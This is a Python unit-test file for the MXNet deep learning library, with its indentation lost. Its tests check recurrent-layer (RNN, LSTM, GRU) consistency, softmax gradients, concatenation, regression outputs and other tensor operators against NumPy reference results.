from numpy.testing import assert_allclose, assert_array_equal
from mxnet.test_utils import *
from mxnet.operator import *
from mxnet.base import py_str, MXNetError, _as_list
from common import setup_module, with_seed, teardown, assert_raises_cudnn_not_satisfied, assert_raises_cuda_not_satisfied, assertRaises
from common import run_in_spawned_process
from nose.tools import assert_raises, ok_
import unittest
import os
def check_rnn_consistency(cell1, cell2, T, N, I, H, grad_req, rtol=1e-2, atol=1e-4):
dshape = (N, T, I)
data = mx.sym.Variable('data')
Y1, _ = cell1.unroll(T, data, layout='NTC', merge_outputs=True)
mod1 = mx.mod.Module(Y1, label_names=None, context=default_context())
mod1.bind(data_shapes=[('data', dshape)], label_shapes=None, inputs_need_grad=True, grad_req=grad_req)
Y2, _ = cell2.unroll(T, data, layout='NTC', merge_outputs=True)
mod2 = mx.mod.Module(Y2, label_names=None, context=default_context())
mod2.bind(data_shapes=[('data', dshape)], label_shapes=None, inputs_need_grad=True, grad_req=grad_req)
mod1.init_params()
args, auxs = mod1.get_params()
args = cell1.unpack_weights(args)
args = cell2.pack_weights(args)
mod2.set_params(args, auxs)
x = mx.random.uniform(shape=dshape)
batch=mx.io.DataBatch(data=[x])
# check inference
mod1.forward(batch, is_train=False)
mod2.forward(batch, is_train=False)
assert_allclose(mod1.get_outputs()[0].asnumpy(), mod2.get_outputs()[0].asnumpy(), rtol=rtol, atol=atol)
# check training
mod1.forward(batch, is_train=True)
mod2.forward(batch, is_train=True)
assert_allclose(mod1.get_outputs()[0].asnumpy(), mod2.get_outputs()[0].asnumpy(), rtol=rtol, atol=atol)
dy = mx.random.uniform(shape=mod1.get_outputs()[0].shape)
mod1.backward(out_grads=[dy])
mod2.backward(out_grads=[dy])
if type(grad_req) is dict and grad_req['data'] == 'null' or grad_req == 'null':
assert(mod1.get_input_grads()[0] == None)
assert(mod2.get_input_grads()[0] == None)
else:
assert_allclose(mod1.get_input_grads()[0].asnumpy(), mod2.get_input_grads()[0].asnumpy(), rtol=rtol, atol=atol)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnn_with_new_param():
rnn_modes = ['rnn_relu', 'rnn_tanh', 'gru', 'lstm']
ngates_ = [1, 1, 3, 4]
num_layers, input_size, seq_len, batch_size, state_size = 3, 128, 5, 64, 8
for bidirectional in [False, True]:
directions = 2 if bidirectional else 1
for mode, ngates in zip(rnn_modes, ngates_):
first_layer_size = (input_size * state_size + state_size * state_size + state_size * 2) * ngates
rest_layer_size = (state_size * directions * state_size + state_size * state_size + state_size * 2) \
* ngates * (num_layers - 1)
param_size = (first_layer_size + rest_layer_size) * directions
sym = mx.sym.RNN(mode=mode, num_layers=num_layers, bidirectional=bidirectional,
state_outputs=False, state_size=state_size, name='rnn')
bind_dict = {
'rnn_data': mx.ndarray.random.uniform(low=-1, high=1, shape=(seq_len, batch_size, input_size)),
'rnn_parameters': mx.ndarray.random.uniform(low=-1, high=1, shape=(param_size)),
'rnn_state': mx.ndarray.zeros(shape=(num_layers * directions, batch_size, state_size))
}
if mode == 'lstm':
bind_dict['rnn_state_cell'] = mx.ndarray.zeros(
shape=(num_layers * directions, batch_size, state_size))
ex = sym.bind(default_context(), bind_dict)
ex.forward(is_train=True)
ex01 = ex.output_dict['rnn_output'].asnumpy()
ex.forward(is_train=False)
ex02 = ex.output_dict['rnn_output'].asnumpy()
assert_allclose(ex01, ex02, rtol=1e-2, atol=1e-4)
bind_dict['rnn_parameters'] = mx.ndarray.random.uniform(low=-1, high=1, shape=(param_size))
ex.copy_params_from(bind_dict)
ex.forward(is_train=True)
ex03 = ex.output_dict['rnn_output'].asnumpy()
ex.forward(is_train=False)
ex04 = ex.output_dict['rnn_output'].asnumpy()
assert_allclose(ex03, ex04, rtol=1e-2, atol=1e-4)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_lstm_sym():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='lstm', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.LSTMCell(H, prefix='l0_'))
stack.add(mx.rnn.LSTMCell(H, prefix='l1_'))
stack.add(mx.rnn.LSTMCell(H, prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_lstm_bidirectional():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='lstm',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.LSTMCell(H, prefix='l0_'),
mx.rnn.LSTMCell(H, prefix='r0_'),
output_prefix='bi_lstm_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.LSTMCell(H, prefix='l1_'),
mx.rnn.LSTMCell(H, prefix='r1_'),
output_prefix='bi_lstm_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
check_rnn_consistency(fused, stack, T, N, I, H, {'data': 'add', 'parameters': 'null'})
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_gru_sym():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='gru', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.GRUCell(H, prefix='l0_'))
stack.add(mx.rnn.GRUCell(H, prefix='l1_'))
stack.add(mx.rnn.GRUCell(H, prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_gru_bidirectional():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='gru',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(H, prefix='l0_'),
mx.rnn.GRUCell(H, prefix='r0_'),
output_prefix='bi_gru_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(H, prefix='l1_'),
mx.rnn.GRUCell(H, prefix='r1_'),
output_prefix='bi_gru_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnntanh_sym():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='rnn_tanh', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.RNNCell(H, activation='tanh', prefix='l0_'))
stack.add(mx.rnn.RNNCell(H, activation='tanh', prefix='l1_'))
stack.add(mx.rnn.RNNCell(H, activation='tanh', prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnntanh_bidirectional():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='rnn_tanh',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='tanh', prefix='l0_'),
mx.rnn.RNNCell(H, activation='tanh', prefix='r0_'),
output_prefix='bi_rnntanh_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='tanh', prefix='l1_'),
mx.rnn.RNNCell(H, activation='tanh', prefix='r1_'),
output_prefix='bi_rnntanh_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnnrelu_sym():
T, N, I, H = 5, 32, 200, 200
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='rnn_relu', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.RNNCell(H, activation='relu', prefix='l0_'))
stack.add(mx.rnn.RNNCell(H, activation='relu', prefix='l1_'))
stack.add(mx.rnn.RNNCell(H, activation='relu', prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnnrelu_bidirectional():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='rnn_relu',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='relu', prefix='l0_'),
mx.rnn.RNNCell(H, activation='relu', prefix='r0_'),
output_prefix='bi_rnnrelu_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='relu', prefix='l1_'),
mx.rnn.RNNCell(H, activation='relu', prefix='r1_'),
output_prefix='bi_rnnrelu_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write', rtol=1e-2, atol=1e-2)
check_rnn_consistency(fused, stack, T, N, I, H, 'add', rtol=1e-2, atol=1e-2)
check_rnn_consistency(fused, stack, T, N, I, H, 'null', rtol=1e-2, atol=1e-2)
@with_seed()
def test_lstm_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
CX = mx.sym.Variable('state_cell')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX, state_cell=CX,
state_size=H, num_layers=5, mode='lstm', p=0.5, state_outputs=True, name='LSTM')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@with_seed()
def test_gru_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='gru', p=0.5, state_outputs=True, name='GRU')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@with_seed()
def test_rnntanh_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_tanh', p=0.5, state_outputs=True, name='RNN_TANH')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
@with_seed()
def test_rnnrelu_dropout():
X = mx.sym.Variable('x')
Params = mx.sym.Variable('params')
HX = mx.sym.Variable('state')
T, N, I, H = 300, 20, 800, 800
rnn = mx.sym.RNN(data=X, parameters=Params, state=HX,
state_size=H, num_layers=5, mode='rnn_relu', p=0.5, state_outputs=True, name='RNN_RELU')
exe = rnn.simple_bind(ctx=mx.cpu(), x=(T, N, I))
out = exe.forward(is_train=True)
out[0].wait_to_read()
def test_RNN_float64():
if default_context().device_type == 'gpu':
return
sym = mx.sym.RNN(
mx.sym.Variable('in'),
mx.sym.Variable('par'),
mx.sym.Variable('s'),
state_size = (2),
num_layers = 1,
mode = 'rnn_tanh'
)
dtype = 'float64'
explicit_grad = {
'in': mx.nd.ones([2, 1, 2], dtype=dtype),
'par': mx.nd.ones([12], dtype=dtype),
's': mx.nd.ones([1, 1, 2], dtype=dtype)
}
args_grad = explicit_grad
grad_req = 'write'
ex = sym.bind(default_context(),
{
'in': mx.nd.ones([2, 1, 2], dtype=dtype),
'par': mx.nd.ones([12], dtype=dtype),
's': mx.nd.ones([1, 1, 2], dtype=dtype)
},
args_grad = args_grad,
grad_req = grad_req
)
ex.forward()
ex.outputs[0].wait_to_read()
def np_softmax(x, axis=-1, temperature=1.0):
x = x - np.max(x, axis=axis, keepdims=True)
x = np.exp(x/temperature)
x /= np.sum(x, axis=axis, keepdims=True)
return x
def check_elementwise_sum_with_shape(shape, n):
# forward
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.ElementWiseSum(*inputs, name='esum')
arr = [mx.nd.empty(shape) for i in range(n)]
arr_grad = [mx.nd.empty(shape) for i in range(n)]
for i in range(n):
arr[i][:] = np.random.uniform(-10, 10, shape)
exec1 = out.bind(default_context(),
args=arr,
args_grad=arr_grad)
exec1.forward(is_train=True)
out1 = exec1.outputs[0]
out = sum(a.asnumpy() for a in arr)
assert_almost_equal(out, out1, rtol=1e-5, atol=1e-5)
out_grad = mx.nd.empty(shape)
out_grad[:] = np.random.uniform(-10, 10, shape)
# backward
exec1.backward([out_grad])
for a in arr_grad:
assert_almost_equal(a, out_grad, rtol=1e-5, atol=1e-5)
@with_seed()
def test_elementwise_sum():
nrepeat = 2
maxdim = 4
for repeat in range(nrepeat):
for dim in range(1, maxdim):
shape = tuple(np.random.randint(1, int(1000**(1.0/dim)), size=dim))
check_elementwise_sum_with_shape(shape, np.random.randint(1, 8))
def check_concat_with_shape(shapes, dimension, skip_second):
# if skip_second is True, second argument will not have gradient.
# it is to test #1130
n = len(shapes)
# forward
target_dim = 0
for shape in shapes:
target_dim += shape[dimension]
inputs = [mx.symbol.Variable('arg%d' % i) for i in range(n)]
out = mx.symbol.Concat(*inputs, name='conc',dim=dimension)
arr = [mx.nd.empty(shape) for shape in shapes]
for i in range(n):
arr[i][:] = shapes[i][dimension]
arr_np = [np.copy(narray.asnumpy()) for narray in arr]
arr_grad = [mx.nd.empty(shape) for shape in shapes]
dict_grad = {}
arg_names = out.list_arguments()
for name, g in zip(arg_names, arr_grad):
if not skip_second or name != 'arg1':
dict_grad[name] = g
args = out.list_arguments()
arg_shapes, out_shapes, aux_shapes = out.infer_shape(**dict(zip(args, shapes)))
out_grad = mx.nd.empty(out_shapes[0])
exec1 = out.bind(default_context(),
args=arr,
args_grad=dict_grad)
exec1.forward(is_train=True)
out1 = exec1.outputs[0]
ret = np.concatenate([narray.asnumpy() for narray in arr], axis=dimension)
assert_almost_equal(out1, ret)
# backward
out1.copyto(out_grad)
out_grad[:] += 1
exec1.backward([out_grad])
for i, name in enumerate(arg_names):
if not skip_second or name != 'arg1':
grad = dict_grad[name]
np_grad = arr_np[i]
assert_almost_equal(grad, np_grad + 1)
@with_seed()
def test_concat():
for dimension in range(4):
n = 2
merge = [2, 3, 4, 5, 6]
a = 2
b = 3
c = 4
# test 2D
if dimension<2:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a))
elif dimension == 1:
shapes.append((a, merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 2, True)
check_concat_with_shape(shapes, dimension - 2, False)
#test 3D
if dimension<3:
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i], a,b))
elif dimension ==1:
shapes.append((a,merge[i],b))
elif dimension ==2:
shapes.append((a,b,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 3, True)
check_concat_with_shape(shapes, dimension - 3, False)
# test 4D
for dim in range(2, 6):
shapes = []
for i in range(dim):
if dimension == 0:
shapes.append((merge[i],a,b,c))
elif dimension == 1:
shapes.append((a,merge[i],b,c))
elif dimension ==2:
shapes.append((a,b,merge[i],c))
elif dimension ==3:
shapes.append((a,b,c,merge[i]))
check_concat_with_shape(shapes,dimension,True)
check_concat_with_shape(shapes,dimension,False)
# Test negative dim
check_concat_with_shape(shapes, dimension - 4, True)
check_concat_with_shape(shapes, dimension - 4, False)
@with_seed()
def test_slice_channel():
def check_slice_channel(data_ndim, axis, num_outputs, squeeze_axis):
ins = []
if squeeze_axis:
shape = np.random.randint(2, 5, data_ndim).tolist()
shape[axis] = num_outputs
out_ele_shape = [ele for ele in shape]
del out_ele_shape[axis]
else:
shape = np.random.randint(1, 5, data_ndim).tolist()
shape[axis] *= num_outputs
out_ele_shape = [ele for ele in shape]
out_ele_shape[axis] //= num_outputs
data_npy = np.random.normal(size=shape)
out_grads_npy = [np.random.normal(size=out_ele_shape) for i in range(num_outputs)]
data = mx.sym.Variable('data')
sym = mx.sym.SliceChannel(data=data, num_outputs=num_outputs, axis=axis, squeeze_axis=squeeze_axis)
exe = sym.simple_bind(ctx=default_context(), data=data_npy.shape)
assert len(exe.outputs) == num_outputs
outputs = exe.forward(is_train=True, data=data_npy)
for i in range(num_outputs):
gt = data_npy.take(np.arange(i * shape[axis]/num_outputs,
(i+1) * shape[axis]/num_outputs).astype(np.int), axis=axis)
if squeeze_axis:
assert_almost_equal(outputs[i], gt.reshape(outputs[i].shape))
else:
assert_almost_equal(outputs[i], gt)
# test backward
exe.backward(out_grads=[mx.nd.array(ele, ctx=default_context()) for ele in out_grads_npy])
if squeeze_axis:
assert_almost_equal(exe.grad_arrays[0],
np.concatenate([np.expand_dims(ele, axis=axis) for ele in out_grads_npy],
axis=axis))
else:
assert_almost_equal(exe.grad_arrays[0],
np.concatenate(out_grads_npy, axis=axis))
check_slice_channel(data_ndim=2, axis=1, num_outputs=3, squeeze_axis=True)
check_slice_channel(data_ndim=4, axis=2, num_outputs=3, squeeze_axis=False)
check_slice_channel(data_ndim=3, axis=-1, num_outputs=2, squeeze_axis=False)
check_slice_channel(data_ndim=5, axis=-2, num_outputs=3, squeeze_axis=True)
@with_seed()
def test_regression():
''' test regression operator '''
def check_regression(symbol, forward, backward, shape, stype='default', densities=[0, 0.5, 1]):
# init executor
data = mx.symbol.Variable('data')
label = mx.symbol.Variable('label', stype=stype)
out = symbol(data, label)
grad_req = {'data': 'write', 'label': 'null'}
out_exec = out.simple_bind(default_context(), grad_req=grad_req,
data=shape, label=shape)
arg_map = dict(zip(out.list_arguments(), out_exec.arg_arrays))
grad_map = dict(zip(out.list_arguments(), out_exec.grad_arrays))
# init data
arr_data = mx.random.uniform(-1, 1, shape)
arg_map["data"][:] = arr_data
# init label based on density
arr_label = arg_map["label"]
atol = 1e-5
for density in densities:
arr_label[:] = rand_ndarray(shape, stype, density=density)
out_exec.forward(is_train=True)
out_exec.backward()
np_out = forward(arr_data.asnumpy())
out_grad = backward(np_out, arr_label.asnumpy().reshape(np_out.shape)) / shape[1]
assert_almost_equal(out_exec.outputs[0], np_out, atol=atol)
assert_almost_equal(grad_map["data"], out_grad, atol=atol)
shape = (50, 30)
check_regression(mx.symbol.LogisticRegressionOutput,
lambda x: 1.0 / (1.0 + np.exp(-x)),
lambda x, y : x - y,
shape)
check_regression(mx.symbol.LinearRegressionOutput,
lambda x: x,
lambda x, y : x - y,
shape)
check_regression(mx.symbol.MAERegressionOutput,
lambda x: x,
lambda x, y : np.where(x > y, np.ones(x.shape), -np.ones(x.shape)),
shape)
check_regression(mx.symbol.LogisticRegressionOutput,
lambda x: 1.0 / (1.0 + np.exp(-x)),
lambda x, y : x - y,
shape, stype='csr')
check_regression(mx.symbol.LinearRegressionOutput,
lambda x: x,
lambda x, y : x - y,
shape, stype='csr')
def check_softmax_grad(xpu):
x = mx.sym.Variable('x')
label = mx.sym.Variable('label')
x_nd = mx.nd.array([[1, 6, 4, 2]], ctx=xpu)
grad_x = mx.nd.zeros((1,4), ctx=xpu)
label_nd = mx.nd.array([1], ctx=xpu)
sym = mx.sym.SoftmaxOutput(data=x, label=label, ignore_label=0, use_ignore=False)
ex = sym.bind(ctx=xpu, args={'x': x_nd, 'label': label_nd}, args_grad={'x': grad_x})
ex.forward(is_train=True)
softmax_out = ex.outputs[0].asnumpy()
expected_softmax_out = [[0.005806628, 0.861780069, 0.116629249, 0.015784052]]
assert np.isclose(softmax_out, expected_softmax_out).all()
ex.backward(is_train=True)
grad_out = ex.grad_arrays[0].asnumpy()
k = int(label_nd[0].asscalar())
expected_grad_out = np.zeros((1,4))
expected_grad_out[0, k] = -1
assert np.isclose(grad_out - softmax_out, expected_grad_out).all()
def check_smoothed_softmax_grad(xpu):
alpha = 0.2
x = mx.sym.Variable('x')
label = mx.sym.Variable('label')
x_nd = mx.nd.array([[1, 6, 4, 2]], ctx=xpu)
grad_x = mx.nd.zeros((1,4), ctx=xpu)
label_nd = mx.nd.array([1], ctx=xpu)
sym = mx.sym.SoftmaxOutput(data=x, label=label, ignore_label=0, use_ignore=False, smooth_alpha=alpha)
ex = sym.bind(ctx=xpu, args={'x': x_nd, 'label': label_nd}, args_grad={'x': grad_x})
ex.forward(is_train=True)
softmax_out = ex.outputs[0].asnumpy()
expected_softmax_out = [[0.005806628, 0.861780069, 0.116629249, 0.015784052]]
assert np.isclose(softmax_out, expected_softmax_out).all()
ex.backward(is_train=True)
grad_out = ex.grad_arrays[0].asnumpy()
k = int(label_nd[0].asscalar())
expected_grad_out = np.full((1,4), fill_value=-alpha/float(4-1))
expected_grad_out[0, k] = - (1 - alpha)
assert np.isclose(grad_out - softmax_out, expected_grad_out).all()
def check_softmax_with_ignore_label(xpu):
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SoftmaxOutput(data=X, label=L, ignore_label=0, use_ignore=True)
shape = (20, 10)
x = mx.nd.empty(shape, ctx = xpu)
l = mx.nd.empty((shape[0],), ctx = xpu)
x_np = np.random.rand(*shape)
l_np = np.random.randint(0, shape[1]-1, (shape[0],))
x[:] = x_np
l[:] = l_np
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
exec1.backward()
grad0 = grad.asnumpy()
for i in range(int(shape[0]/2)):
l_np[i] = 0
l[:] = l_np
exec1.forward(is_train=True)
exec1.backward()
grad1 = grad.asnumpy()
assert abs(np.sum(grad1[:int(shape[0]/2)])) < 1e-5
assert_almost_equal(grad0[int(shape[0]/2):], grad1[int(shape[0]/2):])
def check_softmax_with_shape(shape, xpu, preserve_shape=False):
# bind with label
X = mx.symbol.Variable('X')
L = mx.symbol.Variable('L')
Y = mx.symbol.SoftmaxOutput(data=X, label=L, preserve_shape=preserve_shape)
x = mx.random.uniform(-1, 1, shape, ctx=xpu)
l = mx.random.uniform(-1, 1, shape, ctx=xpu)
l[:] = np_softmax(l.asnumpy())
grad = mx.nd.empty(shape, ctx = xpu)
exec1 = Y.bind(xpu, args = [x, l], args_grad = {'X': grad})
exec1.forward(is_train=True)
out = exec1.outputs[0].asnumpy()
# Non-zero atol required by test_softmax with seed 781663739
rtol = 1e-4
atol = 1e-6
assert_almost_equal(out, np_softmax(x.asnumpy()), rtol=rtol, atol=atol)
exec1.backward()
assert_almost_equal(grad, np_softmax(x.asnumpy()) - l.asnumpy(), rtol=rtol, atol=atol)
def test_python_op():
X = mx.symbol.Variable('X')
op = mx.operator.NumpyOp()
s = op.get_symbol(X, name='numpy_op')
x = mx.ndarray.ones((10))*10
dx = mx.ndarray.zeros((10))
dy = mx.ndarray.ones((10))
exec1 = s.bind(default_context(), args=[x], args_grad = {'X': dx})
exec1.forward(is_train=True)
assert_almost_equal(x, exec1.outputs[0])
exec1.backward(dy)
assert_almost_equal(dy, dx)
def test_swapaxes():
data = mx.symbol.Variable('data')
shape = (2, 3, 4)
data_tmp = np.ones(shape)
data_tmp[0] = 1
data_tmp[1] = 2
arr_data = mx.nd.array(data_tmp)
swap0 = mx.symbol.SwapAxis(data=data, dim1=0, dim2=2)
swap = mx.symbol.SwapAxis(data=swap0, dim1=1, dim2=2)
exe_c = swap.bind(default_context(), args=[arr_data])
exe_c.forward(is_train=True)
out = exe_c.outputs[0]
swap0_ = np.swapaxes(data_tmp, 0, 2)
swap_ = np.swapaxes(swap0_, 1, 2)
assert_almost_equal(out, swap_)
config = [((1, 1, 2), 0, 1),
((1, 1, 2), -1, -2),
((4, 5, 6, 7), 1, 1),
((4, 5, 6, 7), 2, 3),
((4, 5, 6, 7), -2, 2),
((4, 5, 6, 7), -2, -3)]
for shape, axis1, axis2 in config:
data_np = np.random.uniform(size=shape)
data_mx = mx.nd.array(data_np, dtype=data_np.dtype)
ret_np = np.swapaxes(data_np, axis1=axis1, axis2=axis2)
ret_mx = mx.symbol.SwapAxis(data, dim1=axis1, dim2=axis2)
exe_c = ret_mx.bind(default_context(), args=[data_mx])
exe_c.forward(is_train=True)
out = exe_c.outputs[0]
assert_almost_equal(out, ret_np)
@with_seed()
def test_scalarop():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)*5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = 2 / (4-((1+data+1)*2/5)-0.8-(data!=0))
npout_1 = (4-((1+data_tmp+1)*2/5)-0.8-(data_tmp!=0))
npout = 2/npout_1
check_symbolic_forward(test, [data_tmp], [npout])
npout_grad = 2.*2/5
npout_grad = 2*npout_grad /(npout_1 *npout_1 )
check_symbolic_backward(test, [data_tmp], [np.ones(shape)*2], [npout_grad])
@with_seed()
def test_scalar_pow():
data = mx.symbol.Variable('data')
shape = (1, 1)
data_tmp = np.ones(shape)
test = data ** 2
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [data_tmp ** 2])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)], [2 * data_tmp])
@with_seed()
def test_symbol_pow():
shape = (1, 1)
data = mx.symbol.Variable('data')
data_tmp = np.ones(shape)*2
exp = mx.symbol.Variable('exp')
exp_tmp = np.ones(shape)*3
test = data**exp
check_numeric_gradient(test, [data_tmp, exp_tmp])
check_symbolic_forward(test, [data_tmp, exp_tmp], [data_tmp**exp_tmp])
data_dir = data_tmp**(exp_tmp - 1) * exp_tmp
exp_dir = data_tmp**(exp_tmp) * np.log(data_tmp)
check_symbolic_backward(test, [data_tmp, exp_tmp], [np.ones(shape)], [data_dir, exp_dir])
@with_seed()
def test_fully_connected():
data = mx.sym.var("data")
fc_weight = mx.sym.var("weight")
fc_bias = mx.sym.var("bias")
fc = mx.sym.FullyConnected(data=data, weight=fc_weight, bias=fc_bias, num_hidden=10, no_bias=False, name='fc')
data = mx.nd.random.uniform(shape=(5, 5, 5, 13), dtype=np.float32)
fc_weight = mx.nd.random.uniform(shape=(10, 325), dtype=np.float32)
fc_bias = mx.nd.random.uniform(shape=(10), dtype=np.float32)
fc_bias2 = mx.nd.random.uniform(shape=(10, 1), dtype=np.float32)
data_np = data.asnumpy().reshape(5, 325)
fc_weight_np = np.transpose(fc_weight.asnumpy())
fc_bias_np = fc_bias.asnumpy()
res = np.dot(data_np, fc_weight_np) + fc_bias.asnumpy()
check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np}, {'fc_output': res})
check_numeric_gradient(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias_np},
numeric_eps=1e-2, rtol=1e-4, atol=1e-2)
# TODO: Fix Bug #15032 when bias has ndim > 1
#check_symbolic_forward(fc, {'data': data_np, 'weight': fc_weight.asnumpy(), 'bias': fc_bias2.asnumpy()}, {'fc_output': res})
@with_seed()
def test_pow_fn():
shape = (3, 4)
exp = mx.symbol.Variable("exp")
x = np.ones(shape)*3
for y in [mx.sym.pow(2, exp), mx.sym.power(2, exp)]:
check_numeric_gradient(y, [x], numeric_eps=1E-3)
check_symbolic_forward(y, [x], [2**x])
check_symbolic_backward(y, [x], [np.ones(shape)], [np.log(2) * 2**x])
@with_seed()
def test_relu():
def frelu(x):
return np.maximum(x, 0.0)
def frelu_grad(x):
return 1.0 * (x > 0.0)
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.relu(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
eps = 1e-4
# Avoid finite difference method inaccuracies due to discontinuous gradient at the origin.
# Here we replace small problematic inputs with 1.0. Repro issue with seed 97264195.
xa[abs(xa) < eps] = 1.0
ya = frelu(xa)
ga = frelu_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=eps)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga])
